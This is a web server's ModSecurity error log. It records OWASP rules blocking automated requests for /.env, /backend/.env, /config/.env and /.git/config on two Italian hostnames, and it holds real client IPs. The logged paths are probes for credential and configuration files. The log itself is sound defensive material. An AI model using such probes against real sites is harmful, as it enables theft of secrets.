[Sun Sep 28 13:23:27.996092 2025] [:error] [pid 3070799] [client 196.251.70.47:58530] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNkarxCC0bUDJaZYmRyJJAAAACY"]
[Sun Sep 28 13:23:27.996439 2025] [:error] [pid 3070799] [client 196.251.70.47:58530] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNkarxCC0bUDJaZYmRyJJAAAACY"]
[Sun Sep 28 13:23:27.996633 2025] [:error] [pid 3070799] [client 196.251.70.47:58530] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aNkarxCC0bUDJaZYmRyJJAAAACY"]
[Tue Sep 30 11:20:40.305289 2025] [:error] [pid 3123893] [client 45.148.10.154:53958] [client 45.148.10.154] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNug6GcMLn7oClZiwh8a7gAAAAk"]
[Tue Sep 30 11:20:40.307862 2025] [:error] [pid 3123893] [client 45.148.10.154:53958] [client 45.148.10.154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNug6GcMLn7oClZiwh8a7gAAAAk"]
[Tue Sep 30 11:20:40.308034 2025] [:error] [pid 3123893] [client 45.148.10.154:53958] [client 45.148.10.154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aNug6GcMLn7oClZiwh8a7gAAAAk"]
[Tue Sep 30 13:10:06.725314 2025] [:error] [pid 3124858] [client 45.148.10.246:55296] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNu6jt7lc4cd7lmFKiiWDgAAAAE"]
[Tue Sep 30 13:10:06.725563 2025] [:error] [pid 3124858] [client 45.148.10.246:55296] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNu6jt7lc4cd7lmFKiiWDgAAAAE"]
[Tue Sep 30 13:10:06.725763 2025] [:error] [pid 3124858] [client 45.148.10.246:55296] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNu6jt7lc4cd7lmFKiiWDgAAAAE"]
[Tue Sep 30 23:40:08.188210 2025] [:error] [pid 3124034] [client 103.109.103.44:32348] [client 103.109.103.44] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNxOOKKapCwzksdiNI_UqAAAAAw"]
[Tue Sep 30 23:40:08.188492 2025] [:error] [pid 3124034] [client 103.109.103.44:32348] [client 103.109.103.44] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNxOOKKapCwzksdiNI_UqAAAAAw"]
[Tue Sep 30 23:40:08.188678 2025] [:error] [pid 3124034] [client 103.109.103.44:32348] [client 103.109.103.44] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aNxOOKKapCwzksdiNI_UqAAAAAw"]
[Thu Oct 02 03:24:49.438682 2025] [:error] [pid 3166780] [client 18.234.121.6:42136] [client 18.234.121.6] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN3UYepIl-BN1X1GQxhRyQAAAAE"]
[Thu Oct 02 03:24:49.438993 2025] [:error] [pid 3166780] [client 18.234.121.6:42136] [client 18.234.121.6] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN3UYepIl-BN1X1GQxhRyQAAAAE"]
[Thu Oct 02 03:24:49.439165 2025] [:error] [pid 3166780] [client 18.234.121.6:42136] [client 18.234.121.6] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN3UYepIl-BN1X1GQxhRyQAAAAE"]
[Thu Oct 02 08:54:53.957439 2025] [:error] [pid 3168870] [client 213.209.157.232:45246] [client 213.209.157.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN4hvY0sv2fFzAHIs3gsLAAAAAk"]
[Thu Oct 02 08:54:53.957718 2025] [:error] [pid 3168870] [client 213.209.157.232:45246] [client 213.209.157.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN4hvY0sv2fFzAHIs3gsLAAAAAk"]
[Thu Oct 02 08:54:53.957874 2025] [:error] [pid 3168870] [client 213.209.157.232:45246] [client 213.209.157.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN4hvY0sv2fFzAHIs3gsLAAAAAk"]
[Fri Oct 03 10:43:35.889402 2025] [:error] [pid 3191521] [client 185.177.72.13:58282] [client 185.177.72.13] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-MtwbtAoIX7efF4Yk3BAAAAAI"]
[Fri Oct 03 10:43:35.889624 2025] [:error] [pid 3191521] [client 185.177.72.13:58282] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-MtwbtAoIX7efF4Yk3BAAAAAI"]
[Fri Oct 03 10:43:35.889780 2025] [:error] [pid 3191521] [client 185.177.72.13:58282] [client 185.177.72.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-MtwbtAoIX7efF4Yk3BAAAAAI"]
[Fri Oct 03 10:43:36.076015 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFAAAAAU"]
[Fri Oct 03 10:43:36.076225 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFAAAAAU"]
[Fri Oct 03 10:43:36.076388 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFAAAAAU"]
[Fri Oct 03 10:43:36.102140 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFQAAAAU"]
[Fri Oct 03 10:43:36.102368 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFQAAAAU"]
[Fri Oct 03 10:43:36.102544 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFQAAAAU"]
[Fri Oct 03 10:43:36.128586 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFgAAAAU"]
[Fri Oct 03 10:43:36.128794 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFgAAAAU"]
[Fri Oct 03 10:43:36.128964 2025] [:error] [pid 3191526] [client 185.177.72.13:58292] [client 185.177.72.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aN-MuCrsCyKIpddRRnkgFgAAAAU"]
[Fri Oct 03 11:45:33.051565 2025] [:error] [pid 3191526] [client 213.209.157.244:45830] [client 213.209.157.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-bPSrsCyKIpddRRnkgGQAAAAU"]
[Fri Oct 03 11:45:33.051847 2025] [:error] [pid 3191526] [client 213.209.157.244:45830] [client 213.209.157.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-bPSrsCyKIpddRRnkgGQAAAAU"]
[Fri Oct 03 11:45:33.052011 2025] [:error] [pid 3191526] [client 213.209.157.244:45830] [client 213.209.157.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN-bPSrsCyKIpddRRnkgGQAAAAU"]
[Fri Oct 03 16:47:15.155338 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_h81hJCSZIMkwC-iURZwAAABI"]
[Fri Oct 03 16:47:15.156271 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_h81hJCSZIMkwC-iURZwAAABI"]
[Fri Oct 03 16:47:15.156445 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aN_h81hJCSZIMkwC-iURZwAAABI"]
[Fri Oct 03 16:47:15.263595 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_h8zwketANlikPcL2rJwAAAA0"]
[Fri Oct 03 16:47:15.264577 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_h8zwketANlikPcL2rJwAAAA0"]
[Fri Oct 03 16:47:15.264787 2025] [:error] [pid 3205782] [client 93.123.109.60:35688] [client 93.123.109.60] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aN_h8zwketANlikPcL2rJwAAAA0"]
[Fri Oct 03 16:47:15.398367 2025] [:error] [pid 3205788] [client 93.123.109.60:35684] [client 93.123.109.60] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aN_h81hJCSZIMkwC-iURaAAAABI"]
